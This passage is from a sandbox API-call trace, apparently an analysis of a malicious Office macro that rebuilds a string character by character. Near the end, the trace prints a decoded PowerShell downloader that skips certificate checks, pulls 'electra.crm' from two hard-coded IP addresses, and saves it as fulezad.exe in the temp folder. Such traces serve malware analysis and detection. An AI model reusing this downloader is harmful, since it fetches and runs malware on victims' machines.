out: psOut=0x205cf8) returned 0x0 [0047.515] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.515] GetUserDefaultLCID () returned 0x409 [0047.515] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.515] GetUserDefaultLCID () returned 0x409 [0047.515] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.515] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.516] GetUserDefaultLCID () returned 0x409 [0047.516] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.516] GetUserDefaultLCID () returned 0x409 [0047.516] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.516] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.517] GetUserDefaultLCID () returned 0x409 [0047.517] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.517] GetUserDefaultLCID () returned 0x409 [0047.517] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.517] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.517] GetUserDefaultLCID () returned 0x409 [0047.517] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.517] GetUserDefaultLCID () returned 0x409 [0047.517] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.518] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.518] GetUserDefaultLCID () returned 0x409 [0047.518] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.518] GetUserDefaultLCID () returned 0x409 [0047.518] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.518] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.519] GetUserDefaultLCID () returned 0x409 [0047.519] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.519] GetUserDefaultLCID () returned 0x409 [0047.519] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.519] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.520] GetUserDefaultLCID () returned 0x409 [0047.520] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.520] GetUserDefaultLCID () returned 0x409 [0047.520] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.520] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.520] GetUserDefaultLCID () returned 0x409 [0047.520] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.520] GetUserDefaultLCID () returned 0x409 [0047.520] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.520] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.521] GetUserDefaultLCID () returned 0x409 [0047.521] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.521] GetUserDefaultLCID () returned 0x409 [0047.521] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.521] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.522] GetUserDefaultLCID () returned 0x409 [0047.522] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.522] GetUserDefaultLCID () returned 0x409 [0047.522] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.522] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.522] GetUserDefaultLCID () returned 0x409 [0047.522] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.523] GetUserDefaultLCID () returned 0x409 [0047.523] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.523] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.523] GetUserDefaultLCID () returned 0x409 [0047.523] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.523] GetUserDefaultLCID () returned 0x409 [0047.523] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.523] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.524] GetUserDefaultLCID () returned 0x409 [0047.524] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.524] GetUserDefaultLCID () returned 0x409 [0047.524] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.524] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.525] GetUserDefaultLCID () returned 0x409 [0047.525] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.525] GetUserDefaultLCID () returned 0x409 [0047.525] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.525] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.525] GetUserDefaultLCID () returned 0x409 [0047.525] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="ɸ") returned 0x0 [0047.525] GetUserDefaultLCID () returned 0x409 [0047.526] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.526] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.526] GetUserDefaultLCID () returned 0x409 [0047.526] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.526] GetUserDefaultLCID () returned 0x409 [0047.526] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.526] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.527] GetUserDefaultLCID () returned 0x409 [0047.527] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.527] GetUserDefaultLCID () returned 0x409 [0047.527] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.527] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.528] GetUserDefaultLCID () returned 0x409 [0047.528] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.528] GetUserDefaultLCID () returned 0x409 [0047.528] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.528] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.529] GetUserDefaultLCID () returned 0x409 [0047.529] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.529] GetUserDefaultLCID () returned 0x409 [0047.529] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.529] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.529] GetUserDefaultLCID () returned 0x409 [0047.529] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.529] GetUserDefaultLCID () returned 0x409 [0047.529] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.530] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.530] GetUserDefaultLCID () returned 0x409 [0047.530] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.530] GetUserDefaultLCID () returned 0x409 [0047.530] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.530] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.531] GetUserDefaultLCID () returned 0x409 [0047.531] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.531] GetUserDefaultLCID () returned 0x409 [0047.531] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.531] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.532] GetUserDefaultLCID () returned 0x409 [0047.532] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.532] GetUserDefaultLCID () returned 0x409 [0047.532] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.532] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.533] GetUserDefaultLCID () returned 0x409 [0047.533] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.533] GetUserDefaultLCID () returned 0x409 [0047.533] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.533] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.533] GetUserDefaultLCID () returned 0x409 [0047.533] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.533] GetUserDefaultLCID () returned 0x409 [0047.534] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.534] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.534] GetUserDefaultLCID () returned 0x409 [0047.534] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.534] GetUserDefaultLCID () returned 0x409 [0047.534] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.534] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.535] GetUserDefaultLCID () returned 0x409 [0047.535] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.535] GetUserDefaultLCID () returned 0x409 [0047.535] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.535] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.536] GetUserDefaultLCID () returned 0x409 [0047.536] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.536] GetUserDefaultLCID () returned 0x409 [0047.536] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.536] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.537] GetUserDefaultLCID () returned 0x409 [0047.537] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.537] GetUserDefaultLCID () returned 0x409 [0047.537] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.537] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.537] GetUserDefaultLCID () returned 0x409 [0047.537] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.537] GetUserDefaultLCID () returned 0x409 [0047.537] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.538] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.538] GetUserDefaultLCID () returned 0x409 [0047.538] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="ɸ") returned 0x0 [0047.538] GetUserDefaultLCID () returned 0x409 [0047.538] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.538] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.539] GetUserDefaultLCID () returned 0x409 [0047.539] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.539] GetUserDefaultLCID () returned 0x409 [0047.539] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.539] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.540] GetUserDefaultLCID () returned 0x409 [0047.540] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.540] GetUserDefaultLCID () returned 0x409 [0047.540] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.540] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.541] GetUserDefaultLCID () returned 0x409 [0047.541] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.541] GetUserDefaultLCID () returned 0x409 [0047.541] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.541] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.541] GetUserDefaultLCID () returned 0x409 [0047.541] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.541] GetUserDefaultLCID () returned 0x409 [0047.541] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.542] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.542] GetUserDefaultLCID () returned 0x409 [0047.542] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.542] GetUserDefaultLCID () returned 0x409 [0047.542] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.542] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.543] GetUserDefaultLCID () returned 0x409 [0047.543] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.543] GetUserDefaultLCID () returned 0x409 [0047.543] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.543] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.544] GetUserDefaultLCID () returned 0x409 [0047.544] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.544] GetUserDefaultLCID () returned 0x409 [0047.544] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.544] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.544] GetUserDefaultLCID () returned 0x409 [0047.544] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.545] GetUserDefaultLCID () returned 0x409 [0047.545] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.545] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.545] GetUserDefaultLCID () returned 0x409 [0047.545] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.545] GetUserDefaultLCID () returned 0x409 [0047.545] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.545] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.547] GetUserDefaultLCID () returned 0x409 [0047.547] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.547] GetUserDefaultLCID () returned 0x409 [0047.547] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.547] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.548] GetUserDefaultLCID () returned 0x409 [0047.548] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.548] GetUserDefaultLCID () returned 0x409 [0047.548] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.548] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.549] GetUserDefaultLCID () returned 0x409 [0047.549] VarBstrFromI2 (iVal=87, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.549] VarI2FromStr (in: strIn="87", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.549] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.549] VarBstrFromI2 (iVal=60, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.549] VarI2FromStr (in: strIn="60", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.549] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.550] VarBstrFromI2 (iVal=62, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.550] VarI2FromStr (in: strIn="62", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.550] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.551] VarBstrFromI2 (iVal=90, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.551] VarI2FromStr (in: strIn="90", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.551] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.551] VarBstrCat (in: bstrLeft="powershell.exe \"<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; (new-object system.net.webclient <#replace ext#> ).downloadfile($string1,($env:temp+'\\fulezad.exe'));}catch{$beos1=0;}return $beos1;}$mmb1=@('64.44.51.87/electra.crm','89.46.223.114/electra.crm');fo", bstrRight="reach ($bifa in $mmb1){if(split-strings('https://'+$bifa) -eq 1)", pbstrResult=0x205f70 | out: pbstrResult=0x205f70) returned 0x0 [0047.552] VarBstrFromI2 (iVal=104, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\x01ࡌ") returned 0x0 [0047.553] VarI2FromStr (in: strIn="104", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.553] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.553] VarBstrFromI2 (iVal=80, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.553] VarI2FromStr (in: strIn="80", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.553] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.554] VarBstrFromI2 (iVal=78, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.554] VarI2FromStr (in: strIn="78", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.554] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.555] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.555] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.555] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.555] VarBstrFromI2 (iVal=118, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.555] VarI2FromStr (in: strIn="118", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.555] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.556] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.556] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.556] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.557] VarBstrFromI2 (iVal=119, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.557] VarI2FromStr (in: strIn="119", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.557] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.558] VarBstrFromI2 (iVal=69, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="Ȁ䁁") returned 0x0 [0047.558] VarI2FromStr (in: strIn="69", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.558] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.558] VarBstrFromI2 (iVal=48, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.558] VarI2FromStr (in: strIn="48", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.558] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.559] VarBstrFromI2 (iVal=64, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="\xc570\xee71\x7fe") returned 0x0 [0047.559] VarI2FromStr (in: strIn="64", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.559] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.560] VarBstrFromI2 (iVal=103, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.560] VarI2FromStr (in: strIn="103", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.560] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: pvarResult=0x80f6600) returned 0x0 [0047.560] VarBstrFromI2 (iVal=45, lcid=0x409, dwFlags=0x0, pbstrOut=0x205cf8*="") returned 0x0 [0047.561] VarI2FromStr (in: strIn="45", lcid=0x409, dwFlags=0x0, psOut=0x205cf8 | out: psOut=0x205cf8) returned 0x0 [0047.561] VarAdd (in: pvarLeft=0x80f6618, pvarRight=0x80f6630, pvarResult=0x80f6600 | out: 